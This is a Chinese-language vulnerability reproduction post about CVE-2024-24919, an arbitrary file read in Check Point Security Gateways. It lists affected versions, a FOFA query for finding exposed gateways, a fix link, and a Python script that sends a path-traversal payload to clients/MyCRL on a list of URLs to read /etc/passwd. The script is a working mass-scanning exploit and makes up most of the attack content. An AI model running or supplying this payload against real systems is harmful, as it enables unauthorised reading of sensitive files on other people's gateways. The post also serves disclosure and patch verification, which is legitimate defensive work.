Check Point 安全网关任意文件读取漏洞复现(CVE-2024-24919)

1.漏洞描述

Check Point Security Gateways 是 Check Point Sofware 提供的一系列 网络安全Q解决方案。这些解决方案包括下一代防火墙(NGFW)、数据中心安全网关和 A1驱动的量子网关，旨在为企业提供针对复杂网络威胁的先进防护。它们通过集成的威胁防护、统的安全管理和策略控制，确保网络、云、移动和端点的安全。

Check Point Security Gateways 任意文件读取漏洞(CVE-2024-24919)存在在野利用，远程攻击者可以通过构造恶意请求读取服务器上的任意文件，造成敏感信息的泄漏。目前，此漏洞已检测到在野利用。鉴于该漏洞影响范围较大，建议客户尽快做好自查及防护。

2.影响范围

Check Point Security Gateways R77.20 (EOL)

Check Point Security Gateways R77.30 (EOL)

Check Point Security Gateways R80.10 (EOL)

Check Point Security Gateways R80.20 (EOL)

Check Point Security Gateways R80.20.x

Check Point Security Gateways R80.20SP (EOL)

Check Point Security Gateways R80.30 (EOL)

Check Point Security Gateways R80.30SP (EOL)

Check Point Security Gateways R80.40 (EOL)

Check Point Security Gateways R81

Check Point Security Gateways R81.10

Check Point Security Gateways R81.10.x

Check Point Security Gateways R81.20

fofa语法

app="Check_Point-SSL-Network-Extender"

3.漏洞复现

4.python批量验证

import requests
from urllib.parse import urljoin
import urllib3
from requests.exceptions import SSLError

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def send_post_request(base_url, file):
    full_url = urljoin(base_url, 'clients/MyCRL')
    full_payload = "aCSHELL/../../../../../../.." + file

    headers = {
        'Content-Length': str(len(full_payload))
    }

    try:
        response = requests.post(full_url, data=full_payload, headers=headers, proxies=proxies, verify=False)
        if response.status_code == 200 and 'root' in response.content.decode():
            print(f'存在漏洞，URL为: {base_url}')
    except SSLError as e:
        print(f"SSL error accessing {base_url}: {e}")
    except requests.exceptions.RequestException as e:
        print(f"Error accessing {base_url}: {e}")

def read_urls_from_file(file_path):
    try:
        with open(file_path, 'r') as file:
            urls = file.readlines()
        # Strip whitespace characters like `\n` at the end of each line
        urls = [url.strip() for url in urls]
        return urls
    except Exception as e:
        print(f"Error reading URLs from file: {e}")
        return []

if __name__ == "__main__":
    input_file = 'urls.txt'
    target_file = '/etc/passwd'

    urls = read_urls_from_file(input_file)
    for url in urls:
        send_post_request(url, target_file)

5.漏洞修复

目前官方已发布安全补丁，建议用户访问 Check Point 官方支持页面：

https://support.checkpoint.com/results/sk/sk182336